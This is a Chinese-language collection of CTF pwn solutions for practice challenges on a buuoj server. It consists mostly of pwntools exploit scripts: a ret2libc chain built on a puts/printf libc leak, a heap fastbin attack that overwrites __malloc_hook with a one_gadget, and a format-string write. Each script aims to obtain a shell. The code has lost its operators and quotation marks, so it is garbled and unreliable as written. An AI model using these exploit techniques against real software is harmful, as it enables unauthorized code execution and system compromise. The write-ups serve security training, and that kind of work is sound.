puts泄露libc, ret2libc
from pwn import * from LibcSearcher import * url, port node4.buuoj.cn , 25782 filename ./bjdctf_2020_babyrop elf ELF(filename) puts_plt elf.plt[ puts ] puts_got elf.got[ puts ] main_addr elf.sym[ main ] # libc ELF( ) context(arch amd64 , os linux ) # context(arch i386 , os linux ) pop_rdi_addr 0x0000000000400733 debug 0 if debug: # context.log_level debug io process(filename) context.terminal [ tmux , splitw , -h ] # gdb.attach(io) else: io remote(url, port) def B(): gdb.attach(io) pause() def pwn(): payload cyclic(0x20 8) p64(pop_rdi_addr) p64(puts_got) payload p64(puts_plt) p64(main_addr) io.sendlineafter( story!n , payload) puts_addr u64(io.recv(6).ljust(8, b x00 )) log.info( puts address: %#x % puts_addr) libc LibcSearcher( puts , puts_addr) libc_base puts_addr - libc.dump( puts ) system_addr libc_base libc.dump( system ) binsh_addr libc_base libc.dump( str_bin_sh ) payload cyclic(0x20 8) p64(pop_rdi_addr) p64(binsh_addr) p64(system_addr) io.sendlineafter( story!n , payload) if __name__ __main__ : pwn() io.interactive()babyheap_0ctf_2017
直接参考我之前写的blog
https://blog.csdn.net/qq_33976344/article/details/119904057
unsorted bin 堆叠, fastbin attack
from pwn import * url, port node4.buuoj.cn , 25085 filename ./babyheap_0ctf_2017 elf ELF(filename) # libc ELF( ) debug 0 if debug: context.log_level debug io process(filename) # context.terminal [ tmux , splitw , -h ] # gdb.attach(io) else: io remote(url, port) def alloc(size): io.sendlineafter( Command: , 1 ) io.sendlineafter( Size: , str(size)) def fill(idx, cont): io.sendlineafter( Command: , 2 ) io.sendlineafter( Index: , str(idx)) io.sendlineafter( Size: , str(len(cont))) io.sendafter( Content: , cont) def free(idx): io.sendlineafter( Command: , 3 ) io.sendlineafter( Index: , str(idx)) def dump(idx): io.sendlineafter( Command: , 4 ) io.sendlineafter( Index: , str(idx)) io.recvuntil( Content: n ) data io.recvline() return data def pwn(): alloc(0x10) alloc(0x10) alloc(0x10) alloc(0x10) alloc(0x80) free(1) free(2) payload cyclic(16) p64(0) p64(0x21) cyclic(16) p64(0) p64(0x21) p8(0x80) fill(0, payload) payload cyclic(16) p64(0) p64(0x21) fill(3, payload) alloc(0x10) alloc(0x10) payload cyclic(16) p64(0) p64(0x91) fill(3, payload) alloc(0x80) free(4) main_arena_addr u64(dump(2)[:8]) libc_base main_arena_addr - 0x3c4b78 __malloc_hook_addr libc_base 0x00000000003c4b10 one_gadget_addr libc_base 0x4526a # 0x45216 log.info( main_arena_addr 0x%x % main_arena_addr) log.info( libc_base 0x%x % libc_base) log.info( __malloc_hook_addr 0x%x % __malloc_hook_addr) log.info( one_gadget_addr 0x%x % one_gadget_addr) alloc(0x60) free(4) payload p64(libc_base 0x3c4afd) # link fake chunk into fastbin fill(2, payload) alloc(0x60) alloc(0x60) payload p8(0) * 3 p64(one_gadget_addr) # change __malloc_hook fill(6, payload) alloc(233) # call one_gaget io.interactive() if __name__ __main__ : pwn()pwn2_sctf_2016
整数溢出, 然后栈溢出
LibcSearcher就是垃圾, 严重依赖libc-database库, 有时候库不全或者很偏, 浪费时间试错
最后尝试出来服务器上的libc版本为
ubuntu-xenial-amd64-libc6-i386 (id libc6-i386_2.23-0ubuntu10_amd64)
from pwn import * from LibcSearcher import * url, port node4.buuoj.cn , 28087 filename ./pwn2_sctf_2016 elf ELF(filename) # libc ELF( ) # context(arch amd64 , os linux ) context(arch i386 , os linux ) debug 0 if debug: context.log_level debug io process(filename) # context.terminal [ tmux , splitw , -h ] # gdb.attach(io) else: io remote(url, port) def B(): gdb.attach(io) pause() def pwn(): offset 0x2C fmtstr_addr 0x080486F8 printf_plt elf.plt[ printf ] printf_got elf.got[ printf ] main_addr elf.sym[ main ] io.sendlineafter( read? , -1 ) payload cyclic(offset 4) p32(printf_plt) p32(main_addr) payload p32(fmtstr_addr) p32(printf_got) io.sendlineafter( data!n , payload) io.recvuntil( You said: ) io.recvuntil( You said: ) printf_addr u32(io.recv(4)) log.info( printf address: %#x % printf_addr) libc LibcSearcher( printf , printf_addr) libc_base printf_addr - libc.dump( printf ) system_addr libc_base libc.dump( system ) binsh_addr libc_base libc.dump( str_bin_sh ) io.sendlineafter( read? , -1 ) payload cyclic(offset 4) p32(system_addr) p32(main_addr) p32(binsh_addr) io.sendlineafter( data!n , payload) if __name__ __main__ : pwn() io.interactive()jarvisoj_fm
泄露位置是11
fmtstr写, x改成4, 字符数小于等于4, 利用后置位写入
from pwn import * url, port node4.buuoj.cn , 28731 filename ./fm elf ELF(filename) # libc ELF( ) # context(arch amd64 , os linux ) context(arch i386 , os linux ) local 0 if local: context.log_level debug io process(filename) # context.terminal [ tmux , splitw , -h ] # gdb.attach(io) else: io remote(url, port) def B(): gdb.attach(io) pause() def pwn(): io.sendline(b ZZZZ%14$nZZZ b x2CxA0x04x08 ) # 0x0804A02C if __name__ __main__ : pwn() io.interactive()
